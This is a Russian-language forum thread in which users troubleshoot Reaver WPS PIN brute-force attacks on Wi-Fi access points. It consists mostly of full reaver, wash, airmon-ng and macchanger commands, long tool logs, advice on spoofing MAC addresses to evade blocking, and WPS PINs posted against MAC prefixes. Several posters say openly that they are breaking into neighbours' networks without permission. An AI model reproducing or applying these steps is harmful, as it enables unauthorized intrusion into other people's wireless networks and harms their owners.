WPS PIN для таких MAC точек доступа: 54:04:A6:5D:50... 238373## F81:11:32:1F... 961446## B0:48:7A:F5:7B... 090061##
Привет всем! Может поможете чем... Есть точка доступа,сигнал от -65 до ~-50db, мак 80:1F:02:06:x:x видимо точка Edimax. Мой девайс TL-WN7200ND. Пользуюсь Wifislax 4.3, но также пробовал BT5R2,3. Начал ривером подбирать пин (reaver -i mon0 -b ... -c 9): Code: Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Waiting for beacon from 80:1F:02:06:x:x [+] Associated with 80:1F:02:06:x:x (ESSID: TTk) [+] Trying pin 12345670 [+] Trying pin 00005678 [+] Trying pin 01235678 [+] Trying pin 11115670 [+] Trying pin 11115670 [+] Trying pin 22225672 [+] 0.05% complete @ 2012-11-09 22:45:38 (2 seconds/pin) Через некоторое время стали появляться ошибки, причем по логу видно что где-то через час и до утра: Code: [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] 11.87% complete @ 2012-11-09 23:43:35 (2 seconds/pin) [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] 11.87% complete @ 2012-11-09 23:53:48 (3 seconds/pin) ... [+] 11.87% complete @ 2012-11-10 09:57:27 (30 seconds/pin) [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [!] WARNING: 10 failed connections in a row [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] Trying pin 12985678 [!] WARNING: 25 successive start failures [+] Trying pin 12985678 И тепер уже вторую неделю вот так (reaver -i mon0 -b ... -c 9 -vv): Code: Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Switching mon0 to channel 9 [+] Waiting for beacon from 80:1F:02:06:x:x [+] Associated with 80:1F:02:06:x:x (ESSID: TTk) [+] Trying pin 12345670 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request Wash все это время показывает wps no на этой точке (TTk). Также пробовал другие wifi девайсы, добавлял команды essid, уменьшал время -d... С другими точками подбор идет... Из за чего может быть эта ошибка-Receive timeout occurred?? Заранее Спасибо!
Думается варианта тут всего два: 1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить. 2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.
Сигнал до точки остался такой-же, даже в некоторых местах доходит до -45db. По мак блокировку думаю маловероятно, после этого с других wifi карт пробовал, тоже самое получалось... На точке есть клиент, я пробовал подставлять в ривер мак клиента через команду -m... Делал так: Code: ifconfig wlan0 down macchanger -m (мак клиента) wlan0 ifconfig wlan0 up airmon-ng start wlan0 reaver -i mon0 -b (мак точка) -c 9 -m (мак клиента) -vv handshake ловится практически сразу, но брут не помогает...
Нужно сменить МАС-адрес на интерфейсе. Делаем так: Code: ifconfig mon0 down macchanger -m 00:01:02:aa:bb:cc mon0 ifconfig mon0 up Это будет совсем другое дело. Macchanger берём здесь если нету.
В общем попробовал с маком клиента, та же беда и когда клиент есть, и когда нету, сыпятся ошибки - [!] WARNING: Receive timeout occurred... Сигнал до точки ~ -59db. Клиента ~ -56db. Может точка заблокировала WPS до перезагрузки? Ведь как только начал подбирать, дошло до 11% за час... Может есть какие-нибудь еще идеи?
Изначально начался подбор на родном маке TL-WN7200ND, но дошел до 11% и все никак, тепер WARNING: Receive timeout occurred лезет и всё, хоть сначала подбирай или с последнего пина всеравно ошибки.. Мак подставлял клиента, который ассоциировался на этой точке, но также пробовал запускать ривер с 2-x других wifi карт соответственно с разными маками, та же беда лезет, хотя на этих картах другие точки также ломались как и на TL-WN7200ND...
Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred с другими- [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response и так 10 раз и ступор. Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.
второй случай имею на роутере NETGEAR и ничего не получается, как будто М5 вообще не бывает, переставлял цифирку подбор идет дальше но результата нет...
Отпишусь по своей проблеме - WARNING: Receive timeout occurred Отключили в доме свет не надолго, подбор пошел опять, видимо точка блокировалась, а после перезагрузки опять давала подобрать. PIN 80:1F:02:06:x:x - 686018xx может кому пригодится...
F1! F1! F1! BackTrack 5 R3 BlackHat root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [+] Switching mon0 to channel 11 [+] Waiting for beacon from 52:26:ED:8F:4D:E2 [+] Associated with 52:26:ED:8F:4D:E2 (ESSID: HDS) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request root@bt:~# wash -i mon0 -C -s Wash v1.4 WiFi Protected Setup Scan Tool Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- 14:A9:E3:03:24:22 1 -84 1.0 No dmitriyconshin 14:A9:E3:02:4B:3A 1 -81 1.0 No Domolink_451608_R_msk 00:26:5A:319:50 1 -86 1.0 No dlink C8:6C:87:41:25:1F 1 -76 1.0 No O_O 50:67:F0:16:FE:3C 1 -87 1.0 No Andrey 14:A9:E3:01:50:0E 1 -87 1.0 No DOMOLINK_FREEPORT_01500E B0:B2C:3C:7C:30 1 -86 1.0 No Domolink_532202_R_msk 14:A9:E3:02:18:C6 3 -80 1.0 No DOMOLINK_FREEPORT_0218C6 34:08:04:14:7C:BE 6 -86 1.0 No dlink 20:CF:30:CE:10:59 11 -86 1.0 No mksbag пробовал включать aireplay-ng но как он должен работать я не в курсе. не помогло. я вообще в линуксе 0. пока иду на ощупь, с закрытыми глазами. помогите плз. может советом, может ссылочкой на мануальчик. сейчас думаю попробовать wifislax 4.2 final/ может он поможет. только какие там команды прописывать.... та сетка которую я пытаюсь нагнуть имеет самый сильный сигнал. в wash она присутствует. просто в поле копирования не попала. кстати. я пробовал reaverom все сетки корячить. и у всех одно и тоже. ломанул только одну. с совершенно убогим сигналом. минут за 20.
Рекомендую прописать команду следующим образом: reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки. Опция -a, позволяет оптимизировать работу Reaver. Про доп опции к Reaver почитайте тут. Уверены, что на точке "HDS" включен WPS ? В приведенном вами списке wash её нет.
вчера пробовал прописывать -vv --dh-small результат тот же. в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.
хороший сигнал по всей квартире. предполагаю что это ктото из соседей снизу либо сверху. у меня 1 с очень хорошим сигналом 3-4 с нормальным. и ещё 5-7 со слабым. вот одну со слабым я ломанул а с остальными такая вот засада.
Взломал давно dir-615 c помощью dwa-510 + самопальная антенна, заняло около 10 суток, дак сейчас пароль хозяева сменили, а я пин забыл , точнее последние 4 цифры. Сейчас приспособил роутер с openwrt для этого дела. А вообще, плохи дела становятся с уязвимостью, почти все современные роутеры идут с отключенным wps. У меня из 15 сетей только 2 определяются как уязвимые.
